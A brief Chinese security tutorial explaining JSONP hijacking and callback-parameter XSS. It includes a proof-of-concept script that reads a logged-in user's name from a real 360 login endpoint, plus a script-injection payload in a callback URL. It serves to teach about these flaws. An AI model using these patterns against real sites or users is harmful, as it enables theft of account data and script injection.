1、jsonp劫持
如果b.com通过jsonp的方式获取json数据,攻击者通过构造恶意的jsonp调用页面a.com.html,a.com.html中通过<script></script>标签,远程调用b.com下的json文件,被攻击者在已登录b.com时,访问a.com.html,攻击者即可获取敏感数据。
-
<script>
-
function wooyun(v){
-
alert(v.username);
-
}
-
</script>
-
<script src="http://js.login.360.cn/?o=sso&m=info&func=wooyun"></script>
2、callback可定义导致xss
callback参数值可控,输出时未进行过滤转义导致的xss漏洞,如:http://b.com?callback=<script>alert(/xss/)</script>